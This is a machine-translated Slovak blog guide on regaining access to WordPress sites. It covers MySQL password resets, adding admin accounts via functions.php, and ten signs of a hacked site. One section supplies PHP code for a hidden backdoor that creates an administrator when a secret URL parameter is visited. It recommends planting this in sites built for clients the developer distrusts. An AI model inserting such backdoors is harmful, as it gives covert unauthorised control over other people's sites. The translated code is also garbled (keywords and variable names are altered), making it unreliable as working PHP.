Ako zaseknúť webovú stránku WordPress, kompletný sprievodca

Ako sa dostať na webovú stránku WordPress, kompletný sprievodca


Neospravedlňujeme, neschvaľujeme ani nepodporujeme žiadne nezákonné alebo škodlivé správanie! Účelom tohto článku je vysvetliť, ako hackovať alebo znovu získať prístup na web WordPress, ktorý patrí vám, alebo či máte práva na úpravy, správu a prístup. Nech robíte čokoľvek, robíte to sami. Nie sme zodpovední za vaše konanie. Táto príručka slúži iba na vzdelávacie účely.

Popísané metódy vám pomôžu znovu získať prístup na web, aj keď už nemáte účet, ale budú vyžadovať nejaké informácie o webe a nepomôžu vám preniknúť do náhodnej inštalácie WordPress..

V tejto príručke vám ukážeme:

  • Ako sa dostať na webovú stránku WordPress
  • Ako vytvoriť backdoor vo WordPress
  • Ako vytvoriť nový užívateľský účet cez FTP
  • 10 značiek, že vaša stránka WordPress je napadnutá

Ako sa dostať na webovú stránku WordPress, kompletný sprievodca

Situácie, v ktorých si môžete pomôcť

Ak sa nachádzate v jednej z nasledujúcich situácií, naše metódy vám pomôžu znovu získať prístup:

  • zabudli ste používateľské meno alebo e-mailovú adresu
  • možnosť obnovenia hesla nefunguje na hostiteľskom serveri
  • e-mailové správy na obnovenie hesla neprechádzajú
  • už nemáte prístup k e-mailovej adrese účtu
  • poznáte meno používateľa a heslo, ale kombinácia jednoducho nefunguje

Ak chcete používať metódy opísané nižšie, budete potrebovať iba jeden z nasledujúcich:

  • FTP prístup na server alebo
  • cPanelový prístup k serveru alebo
  • prístup k databáze MySQL a možnosť vzdialeného pripojenia k nej

Metóda č. 1 – spôsob MySQL

Táto metóda sa používa na zmenu hesla (alebo používateľského mena v prípade potreby) existujúceho používateľa alebo na vytvorenie nového účtu. Budete potrebovať prístup cPanel alebo priamy prístup MySQL do databázy stránok. Začnime zmenou hesla existujúceho používateľa.

Ak používate cPanel, prihlasovacie meno (cPanel je vždy prístupné cez https://yoursite.com:2083 link), vyhľadajte a otvorte phpMyAdmin. Zoznam databáz a tabuliek je na ľavej strane. Hľadáte stôl, ktorý končí _users. Asi to bude wp_users, ale ak máte na serveri nainštalovaných viac ako jednu stránku WordPress, musíte nájsť tú správnu.

Správna tabuľka obsahuje používateľa, ktorého chcete upraviť. Ak sa pripájate k serveru MySQL pomocou nejakého externého klienta, napríklad, postupujte rovnako SQLyog. Po nájdení tabuľky a skutočného záznamu používateľa je potrebné zmeniť heslo.

Ako ste už asi prišli na to, heslo sa uloží do priečinka user_pass hashed pomocou algoritmu MD5. Otvor online generátor MD5 zadajte heslo, ktoré chcete použiť, a kliknite na „Hash“. Skopírujte vygenerovaný reťazec a nahradiť pôvodné heslo s tým. V phpMyAdmin môžete pole upraviť dvojitým kliknutím na toto pole. Tento postup je podobný u iných klientov MySQL. Uložte zmeny a prihláste sa do WordPress pomocou nového hesla.

Tabuľka používateľov WP

Používateľské mená, heslá typu hash a e-maily sa ukladajú v systéme Windows wp_users databázová tabuľka

Stále na metóde č. 1 – vytvorenie nového používateľa

Vytvorenie nového používateľa je trochu zložitejšie, ale stále zvládnuteľné za menej ako minútu. Vytvorte nový záznam v tabuľke užívate ov a naplnenie: user_login, user_pass (hashed, pomocou funkcie MD5 opísanej vyššie) a user_email. Všetky ostatné polia môžu zostať prázdne; na tom nezáleží. Uložte nový záznam. Po uložení mu MySQL poskytne jedinečné ID. Je to číslo v poli ID. Zapamätaj si to.

Teraz choďte na _usermeta stôl. pamätať, predpona tabuľky musí byť rovnaká ako predpona používateľov. Napríklad wp_users a wp_usersmeta. Ak predpona nie je rovnaká, upravujete nesprávnu tabuľku (inej inštalácie WP) a nový účet nebude fungovať. Vytvoríme dva nové záznamy. Ignorovať umeta_id pole pre oboch. sada ID používateľa na hodnotu, ktorú ste si práve zapamätali (nová hodnota ID v tabuľke používateľov). Prvý súbor záznamov meta_key na wpct_user_level a meta_value na 10. Za druhé meta_key na wpct_capabilities a meta_value na a: 1: {s: 13: "správca" b: 1;}. Uložiť oboje. Hotovo – prihlásiť sa!

Metóda č. 2 – spôsob funkcie.php

Tento prístup je možné využiť buď úpravou funkcií.php cez cPanel alebo pomocou FTP klienta. Ak používate cPanel, nájdite Správcu súborov a otvorte ho. Najprv musíme nájsť priečinok aktívnej témy.

Ísť do public_html / wp_content / themes zložky. Ak okamžite uvidíte svoju tému a viete, ktorá je – skvelá. Otvorte priečinok a začnite upravovať functions.php. Ak nie, otvorte web, kliknite pravým tlačidlom myši kdekoľvek a vyberte možnosť „Zobraziť zdroj“. Potom stlačte Ctrl + F a začnite písať / Themes / čoskoro budete mať zvýraznených veľa adries URL a poznáte názov priečinka aktívnej témy.

Nájdite ho v štruktúre súboru, otvorte ho a začnite upravovať functions.php. Skopírujte / prilepte nasledujúci kód na koniec súboru. Nezabudnite na záver ?> Značky PHP, ak ich máte. Musia byť na poslednom riadku. Vložte kód pred ne.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (pole ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = new WP_User ($ user_id);
$ User-> set_role ( 'správcu');
}

Upravte iba prvé dva riadky kódu tak, aby odrážali váš nový účet. Ak už v rámci WP existuje používateľ s týmto e-mailom, nový účet nebude vytvorený, preto skontrolujte, či je nový. Zmeňte tiež heslo – nenechajte sa napadnúť deťmi skriptu. Po uložení súboru jednoducho otvorte svoj web, spustí sa kód, vytvorí sa nový účet s oprávneniami správcu a budete sa s ním môcť prihlásiť..

Po vykonaní tohto postupu nezabudnite kód odstrániť functions.php.

Iné metódy hackovania

Poznaním hesla FTP, cPanel alebo MySQL dokazujete, že máte legitímne prístupové právo na server, a preto by ste mali mať prístup aj k inštaláciám WordPress. Ak nemáte žiadny z týchto účtov, ste na dobrej úrovni (prenikajú na stránky iných ľudí) a to nie je pekné!

Pamätajte, že získanie neoprávneného prístupu k akýmkoľvek počítačom, webom alebo serverom je závažným trestným činom a vo väčšine krajín sa s ním okamžite zaobchádza..

Ak máte strach, že váš web WordPress môže byť napadnutý, skontrolujte túto stránku pomocou bezplatného bezpečnostného skenera WordPress. Ak nemáte čas na nastavenie svojho blogu, urobme to za vás.

Ako vytvoriť backdoor vo WordPress

Ak sú predné dvere zatvorené, môžete vyskúšať zadné dvere. Môže to znieť ako nebezpečný spôsob použitia kódu na vstup na web bez toho, aby ste k nemu mali prístup, ale v skutočnosti sú časy, keď potrebujete ovládať svoju vlastnú stránku, ak ju niekto ukradol..

Ak vytvára webové stránky pre iných ľudí, čo robíte, skôr alebo neskôr bude existovať klient, ktorý vám odmietne zaplatiť za vašu prácu; klient, ktorý odstráni vaše prihlasovacie údaje a prevezme kontrolu nad všetkým, čo ste urobili. Niekedy bude stačiť vytvoriť nového používateľa pomocou FTP alebo resetovať heslo. Keď to nestačí, možno budete chcieť preniknúť naspäť alebo vytvoriť prístup na svoje administrátorské stránky.

Ale ak ste sa rozhodli skryť malý kúsok kódu v prostredí WordPress, mohli by ste si ušetriť nejakú dôstojnosť a získať prístup na web WordPress s oprávneniami správcu. A tu začínajú hry.

Bez ohľadu na to, koľkokrát tento zlodej vymaže vaše informácie alebo obnoví zálohu na serveri, ktorý pravdepodobne vlastní, existuje šanca, že nepozná nič o vchodoch do zadných dverí. Keby to urobil, pravdepodobne by ani nepotreboval vašu pomoc pri nastavovaní WordPress, správne?

Vytvorte zadné vrátka:

Dobre, pri rozhovore dosť; tu je kúsok kódu, ktorý budete musieť urobiť:

  1. Otvorte súbor function.php
  2. Skopírujte / prilepte nasledujúci kód:
  3. add_action ('wp_head', 'wploop_backdoor');
    function wploop_backdoor () {
    Ak ($ _GET ['backdoor'] == 'knockknock') {
    vyžadujú ( 'WP-zahŕňa / registration.php');
    Ak (! Username_exists ('username')) {
    $ user_id = wp_create_user ('name', 'pass');
    $ user = new WP_User ($ user_id);
    $ User-> set_role ( 'správcu');
    }
    }
    }
    ?>
  4. Uložiť zmeny

Ak kód ponecháte v pôvodnom stave, stačí navštíviť stránky, aby ste si mohli vytvoriť nového správcu http://www.yourdomain.com/?backdoor=knockknock

Po načítaní stránky je vaše nové používateľské meno “názov” a heslo “Prejst”.

Samozrejme, môžete to zmeniť v kóde vyššie zmenou výrazov „name“ a „pass“ k čomukoľvek. Môžete tiež zmeniť odkaz na zadné dvere zmenou výrazu „zadné vrátka“ alebo „klepanie“ na čokoľvek, s čím prídete..

Vyskúšajte túto funkciu – nielen to je zábava, ale môže vám to skutočne pomôcť niekedy v budúcnosti, keď sa chystáte vytvoriť webovú stránku pre niekoho, komu úplne neveríte. Mali by ste tiež vylepšiť svoje zručnosti v oblasti WordPress a blogovania.

Ako vytvoriť nový užívateľský účet cez FTP

Vytvorenie nových používateľských účtov na WordPress je veľmi jednoduché. Ako správca musíte prejdite na stránku Správca používateľov kde si môžete vytvoriť nový účet pre akúkoľvek rolu užívateľa. To sa dá urobiť za pár sekúnd a novo vytvorený užívateľ sa môže okamžite prihlásiť pomocou zadaného užívateľského mena a hesla.

Čo sa však stane, ak stratíte prístup k svojmu správcovi WordPress? Veci sa môžu trochu komplikovať, ale nebojte sa – máme pre vás funkciu, ktorá vám môže zachrániť život správcu.

Či už váš účet odstránil iný správca, či ste omylom odstránili všetkých používateľov z databázy, či ste použili nefunkčný doplnok alebo ste sa dostali do hacku, stále sa môžete dostať pod kontrolu. Niekedy možno budete môcť získať prístup iba k vášmu FTP serveru, zatiaľ čo HTTP bude mimo váš dosah a budete si musieť vytvoriť nového správcu. Aj keď to môže byť zriedkavý prípad, nasledujúca funkcia vás uloží.

Vytvorenie nového účtu mimo správcovského prostredia WordPress, všetko, čo budete potrebovať, je FTP prístup na vaše stránky. Ako správca by ste mali mať všetky potrebné informácie na prihlásenie na svoj server a môžete rýchlo vytvoriť nový účet vytvorením novej funkcie vo svojom motíve.

Vytvorte si nový užívateľský účet cez FTP:

  1. Otvorte FTP klienta a pripojte sa k svojmu účtu
  2. Prejdite na obsah wp / témy
  3. Otvorte priečinok témy, ktorú používate
  4. Vyhľadajte súbor function.php a upravte ho
  5. Skopírujte a prilepte nasledujúcu funkciu:
  6. function admin_account () {
    $ user = 'Username';
    $ pass = 'Heslo';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }}
    ADD_ACTION ( 'init', 'admin_account');
    
  7. Zmeňte používateľské meno, heslo a e-mail na niečo jedinečné
  8. Uložiť zmeny

Uistite sa, že používateľské meno, heslo a e-mailová adresa, ktoré ste nastavili vo funkcii, sú jedinečné alebo inak funkcia nebude správne fungovať. Po uložení zmien ste hotoví a môžete prejsť na prihlasovací panel WP. Použite nové informácie na prihlásenie a po overení účtu môžete funkciu odstrániť zo súboru function.php.

Funkcia zobrazená vyššie vytvára účet správcu, môžete ho však ľahko upraviť tak, aby ste vytvorili účet s akoukoľvek inou rolou používateľa. jednoducho zmeniť úlohu na 8th riadok kódu editora, autora, prispievateľa, predplatiteľa alebo akejkoľvek inej role používateľa, ktorú ste vytvorili.

Bohužiaľ, ak ste stratili správcovský účet, stratili ste tiež všetky príspevky napísané pod týmto používateľským menom. Preto by ste si mali vždy uchovávať zálohu, ktorú môžete ľahko získať. Ak toto čítate a máte účet správcu, vezmite si toto pripomenutie a okamžite vytvorte zálohu a tento článok si uložiť ako záložku pre prípad, že by ste si v budúcnosti mali vytvoriť účet mimo WordPress.

10 značiek, že vaša stránka WordPress je napadnutá

WordPress je obrovská platforma pre blogovanie. Existujú milióny používateľov a zdá sa, že ich počet každý deň rýchlo rastie. Ľudia majú tendenciu prenášať svoje webové stránky vytvorené v iných systémoch na správu obsahu do tohto systému s otvoreným zdrojom častejšie, ako si myslíte. A hoci je to dobré, znamená to hackeri tiež umiestnia WordPress na prvé miesto, keď sa pokúšajú napadnúť náhodné stránky.

Zvyčajne, ak vás napadnú, budete o tom vedieť okamžite. Vaše stránky sa stanú neprístupnými; nebudete sa môcť prihlásiť a niekedy hacker dokonca zanechá správu na titulnej stránke. Ale častejšie ako nie, možno si ani nevšimnete, že sa niečo zmenilo. V tejto časti článku vám ukážeme niekoľko príznakov, ktoré by vám mohli ukázať, že váš web WordPress je napadnutý hackom, a niekoľko riešení problému..

1. Neúspešné prihlásenie

Tento znak je do značnej miery zrejmý. Ak ste už nejakú dobu používali kombináciu používateľského mena a hesla bez akýchkoľvek problémov, môžete byť podozrivý, ak náhle WordPress nerozpozná váš účet.. Ak sa hacker prihlási na vaše stránky, je pravdepodobné, že rýchlo zmení administrátorské práva.

Možno si mohol zmeniť heslo alebo úplne odstrániť váš účet. Predtým, ako začnete panikárovať po prvom použití správ WordPress o nesprávnom používateľskom mene / hesle, zvážte skutočnosť, že ste pravdepodobne zadali nesprávnu kombináciu alebo že ste zapli tlačidlo zámku veľkých písmen.

Riešenie: Skúste obnoviť heslo pomocou e-mailu alebo sa pomocou iného účtu prihláste. Ak sa chcete uistiť, že vaše prihlásenie zostane v bezpečí, odporúčame vám nainštalovať Prihlásiť sa Ninja plugin pre WordPress.

2. Na váš web sa pridá škodlivý obsah

Stránka obsahuje upozornenie na škodlivý softvér

Ak na svojich stránkach začnete zaznamenávať neznámy obsah, môžete si robiť starosti. Keď dostanú šancu na prístup do vašej administratívnej oblasti, hackeri budú môcť zmeniť svoje základné súbory a súbory tém a doplnkov. To znamená, že môžu zmeniť všetko, čo chcú.

Zatiaľ čo niektorí hackeri drasticky upravia vzhľad svojej stránky a možno dokonca spresnia, že ste sa dostali na hack, ostatní budú o tom oveľa jemnejšie.

Riešenie: Skúste vyhľadať skrytý obsah v kóde webovej stránky. V päte stránky sa môžu nachádzať odkazy na hackerov so škodlivým softvérom alebo môžu mať nainštalované kontextové okná, ktoré sa pravidelne otvárajú vašim zákazníkom. Použite program Security Ninja na prehľadanie svojich stránok alebo nepretržité sledovanie týchto problémov.

3. Podozrivé návštevy

Ak nesledujete svoj web, mali by ste to začať okamžite. Jednoduchým spôsobom je použitie služby Google Analytics, ktorá okrem mnohých ďalších funkcií vám môže povedať, koľko návštev získate a odkiaľ tieto návštevy prichádzajú. Po určitom čase spoznáte svoje webové stránky. To znamená, že budete vedieť, odkiaľ prichádzajú návštevy, budete vedieť, kedy spustíte novú kampaň a kedy sa objavia nové propagačné odkazy vo voľnej prírode..

Ak si však náhle všimnete, že vaše stránky získavajú z podozrivej domény obrovské množstvo nových návštev, budete to chcieť ďalej prešetriť, pretože vaše stránky môžu byť napadnuté. Zvyčajne bude mať tento druh návštev za následok 100% mieru okamžitých odchodov, čo znamená, že bol prístup iba na jednu stránku. Hackeri často používajú automatizované systémy, ktoré vedú k iným zlým webom. Či už sa jedná o zlý kód, ktorý sa na vašom webe spustí, alebo ste sa stali súčasťou siete na šírenie spamu, to sa môže prejaviť vážne a na svojom webe budete musieť skontrolovať, či neobsahuje škodlivý kód..

Riešenie: použitie Nástroje pre správcov webu Google nájsť podozrivé domény

4. Náhly pokles dopravy

Bezpečné prehliadanie Stav lokality

Na rozdiel od posledného uvedeného náznaku hackerstva by vás tento mohol upozorniť, pretože náhle klesá počet návštev. Namiesto toho, aby sme vám posielali nové návštevy, hacker by mohol odosielať návštevy mimo vašich stránok. Môže k tomu dôjsť, pretože hacker presmeroval vašu stránku na inú. Ďalším dôvodom, prečo získať menej návštevníkov, je to, že spoločnosť Google zakázala vaše stránky. Táto akcia zobrazí správu každému používateľovi, ktorý sa môže rozhodnúť neotvoriť vaše stránky, pretože je infikovaný.

Riešenie: Používajte Google Stav stránok bezpečného prehliadania aby ste skontrolovali, či je váš web označený ako nebezpečný a či je v súčasnosti nebezpečné navštíviť ho.

5. Výsledky vyhľadávacieho nástroja sú zvláštne

Ak ste na svojich stránkach nezaznamenali žiadne zmeny, ale zistíte, že výsledky vyhľadávania v službách Google a ďalších vyhľadávacích nástrojoch sú zvláštne (zobrazujú rôzne názvy a ďalšie metaúdaje), môže to byť jasný znak napadnutého webu. Hacker mohol zmeniť váš obsah spôsobom, ktorý je viditeľný iba pre odborníka. Napriek tomu by zmena bola viditeľná vo výsledkoch vyhľadávacieho nástroja.

Riešenie: Skontrolujte svoje stránky pomocou Nástroje pre správcov webu Google, a skontrolujte, či sa tým vaše webové stránky nenapadli bezplatný online nástroj.

6. Nemôžete odosielať ani prijímať e-maily

Keď hacker získa prístup na vaše stránky, pravdepodobne bude chcieť použite svoj server na spamovanie všetkým ostatným. Keď zistíte, že zo svojho WordPress nemôžete odosielať ani prijímať nové e-maily, môže to byť jasný znak toho, že ste sa dostali do hacku. Skontrolujte svoj e-mail ešte raz a potom sa obráťte na svojho poskytovateľa, aby ste sa uistili, že nedošlo k chybám.

Riešenie: Otestujte si svoj WordPress funkcia pošty pomocou tohto bezplatného doplnku.

7. Stránka neexistuje

Server nebol nájdený

Sú chvíle, keď hackeri nepristúpia na vaše stránky, aby mohli umiestniť škodlivý kód, presmerovať používateľov alebo použiť váš e-mail na spam. niekedy, budú chcieť iba zlyhať vaše stránky. Hacker málokedy úspešne odstráni všetko z celého servera. Preto je dôležité, aby ste hosťovali svoje súbory v renomovanej hostingovej spoločnosti, ktorá zaistí bezpečnosť a tiež bude denne alebo najmenej týždenne zálohovať vaše webové stránky. Je dobrým zvykom, že z času na čas tiež robíte vlastné zálohy, aby bolo možné stránku rýchlo obnoviť.

Riešenie: Nainštalujte jeden z najlepších doplnkov na správu zálohy vo WordPress.

8. Podozrivé súbory

Podobné škodlivému obsahu, ktorý sa môže pridať do existujúcich súborov, hacker by mohol zasadiť ďalšie súbory kdekoľvek vo vašom koreňovom priečinku. Je dobré poznať si cestu okolo WordPress, ale ak nemáte skúsenosti, mali by ste mať k dispozícii bezpečnostný nástroj, ktorý dokáže skontrolovať všetky vaše súbory a aktivity. Nedávno sme preskúmali aplikáciu Security Ninja, ktorá je perfektným nástrojom na kontrolu všetkých vašich súborov WordPress.

Riešenie: Skúste vyhľadať súbory, ktoré nepatria do vašej inštalácie WordPress. Použite program Security Ninja na pravidelné skenovanie vašich stránok a automatické vyhľadávanie týchto súborov. Potom odstráňte súbory alebo odstráňte škodlivý kód z infikovaných súborov. Nezabudnite na doplnok Core Scanner pre program Security Ninja.

9. Noví členovia

V závislosti od vašich stránok budete možno jediný, kto bude môcť pridať nových členov. V takom prípade môže e-mail s informáciou o novo zaregistrovaných používateľoch spustiť alarm. Ak existujú iní správcovia, ktorí majú možnosť pridávať nových členov, informujte sa u nich o podozrivej aktivite.

Riešenie: Zmeňte prihlasovaciu webovú adresu pomocou bezplatného doplnku, obmedzte prístup na svoju prihlasovaciu stránku WordPress pomocou súboru .htpasswd a pomocou prihlasovacieho Ninja neustále chránite prihlasovací formulár.

10. Pozrite sa na naplánované udalosti na vašom serveri

Po tom, čo hacker nájde cestu, hacker niekedy na vašom webe nič neurobí. Namiesto toho, opustia naplánované udalosti čo môže v budúcnosti poškodiť vaše stránky. Táto technika je nebezpečná, pretože hacker môže najskôr nechať skúseného obete bezradným. Môžete byť infikovaní a o tom nič neviete.

Riešenie: Skontrolujte svoje úlohy CRON na serveri, ktorý používate, a uistite sa, že neexistujú žiadne podozrivé naplánované úlohy.

Zabalenie

Dúfame, že tento článok vám pomôže spravovať ešte bezpečnejší web WordPress a že vám pomôže znovu získať prístup k nemu v zlých situáciách. a aj keď sú vaše stránky čisté, nepovažujte to za samozrejmé.
Vždy sa uistite, že váš blog je tak bezpečný, ako môže byť. Odporúčame bezpečnostné doplnky pre WordPress, ktoré vás môžu najviac ušetriť. Stále však nepoužívajte nebezpečné heslo a buďte opatrní pri hackovaní na svoju vlastnú stránku WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map